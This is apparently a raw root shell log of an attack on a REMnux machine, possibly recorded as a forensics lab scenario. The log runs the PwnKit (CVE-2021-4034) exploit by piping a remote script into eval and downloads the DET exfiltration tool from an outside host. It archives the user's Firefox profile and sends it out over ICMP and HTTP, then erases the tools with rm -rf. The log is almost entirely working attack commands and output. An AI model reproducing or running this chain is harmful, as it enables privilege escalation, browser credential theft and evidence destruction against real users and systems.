# 
id

uid=0(root) gid=0(root) groups=0(root)
# 
uname -r

5.4.0-72-generic
# 
lsb_release -a

No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 20.04.2 LTS
Release:	20.04
Codename:	focal
# 
pwd

/home/remnux/Desktop
# 
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"

cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

whoami

root

rm -rf *
wget  10.2.32.72:7777/DET.zip

--2022-11-15 04:12:01--  http://10.2.32.72:7777/DET.zip
Connecting to 10.2.32.72:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8142 (8.0K) [application/zip]
Saving to: 'DET.zip'

     0K .......                                               100%  623M=0s

2022-11-15 04:12:01 (623 MB/s) - 'DET.zip' saved [8142/8142]


unzip DET.zip

Archive:  DET.zip
  inflating: config.json             
  inflating: det.py                  
   creating: plugins/
  inflating: plugins/http.py         
  inflating: plugins/http.pyc        
  inflating: plugins/icmp.py         
  inflating: plugins/icmp.pyc        

ls

DET.zip
config.json
det.py
plugins

cd /home
ls

evil-hacker
remnux

cd remnux
ls -la

total 96
drwxr-xr-x 17 remnux remnux 4096 Nov 14 21:41 .
drwxr-xr-x  4 root   root   4096 Nov 15 01:56 ..
-rw-------  1 remnux remnux    8 Apr 20  2021 .bash_history
-rw-r--r--  1 remnux remnux  220 Apr 20  2021 .bash_logout
-rw-r--r--  1 remnux remnux 3906 Apr 20  2021 .bashrc
drwx------ 13 remnux remnux 4096 Nov 15 04:00 .cache
drwxr-xr-x 11 remnux remnux 4096 Nov 14 22:28 .config
-rw-r--r--  1 remnux remnux 1267 Apr 20  2021 .curlrc
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 .dbus
drwxr-xr-x  4 remnux remnux 4096 Apr 20  2021 .ghidra
drwx------  3 remnux remnux 4096 Apr 20  2021 .gnupg
drwxr-xr-x  5 remnux remnux 4096 Nov 14 21:26 .local
-rw-r--r--  1 remnux remnux  212 Apr 20  2021 .malwapi.conf
drwx------  5 remnux remnux 4096 Nov 14 21:41 .mozilla
-rw-r--r--  1 remnux remnux  807 Apr 20  2021 .profile
-rw-r--r--  1 remnux remnux    0 Apr 20  2021 .sudo_as_admin_successful
-rw-r--r--  1 remnux remnux 1345 Apr 20  2021 .wgetrc
drwxr-xr-x  3 remnux remnux 4096 Nov 15 04:12 Desktop
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Documents
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Downloads
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Music
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Pictures
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Public
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Templates
drwxr-xr-x  2 remnux remnux 4096 Apr 20  2021 Videos

cd .mozilla/firefox/
ls

7ltvf97n.default-release
Crash Reports
Pending Pings
installs.ini
ltrbemh4.default
profiles.ini

7z a profile.zip ./7ltvf97n.default-release


7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=C,Utf16=off,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i3-10100 CPU @ 3.60GHz (A0653),ASM,AES-NI)

Scanning the drive:
34 folders, 69 files, 27207961 bytes (26 MiB)

Creating archive: profile.zip

Items to compress: 103


Files read from disk: 69
Archive size: 5070622 bytes (4952 KiB)
Everything is Ok

cd /home/remnux/Desktop
python2 det.py -c ./config.json -p icmp,http -f /home/remnux/.mozilla/firefox/profile.zip >/dev/null 2>&1
ls

DET.zip
config.json
det.py
plugins

rm *

rm: cannot remove 'plugins': Is a directory

rm -rf *
exit

# 